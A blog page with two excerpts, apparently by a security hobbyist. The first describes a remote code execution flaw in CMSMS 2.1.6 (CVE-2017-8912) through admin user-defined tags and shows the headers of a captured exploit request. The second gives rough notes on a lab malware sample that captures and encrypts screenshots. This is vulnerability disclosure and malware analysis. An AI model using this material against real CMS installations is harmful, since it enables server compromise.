CMSMS 2.1.6 Multiple Vulnerabilities

One day I felt like reviewing the source code of some random CMS and I picked CMSMS. This is totally random and I did this to kill boredom.

Remote Code Execution – CVE-2017-8912

In admin/editusertag.php you can create custom user defined tags in which evil PHP functions are not blacklisted.

POST /cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4
Content-Length: 115
Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=2a7da2216d41e0ac; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5
Connection: close
Pragma: no-cache
Cache-Control: no-cache


Continue reading


Lab 13-02 Analysis

I felt bored and thought of having a look at this exe. These are my rough notes on this one.
Every 5 seconds the function ‘401851’ is called.

Basically, this malware takes screenshots and encrypts them and stores them in the current directory starting with “temp%08x” % GetTickCount().

Continue reading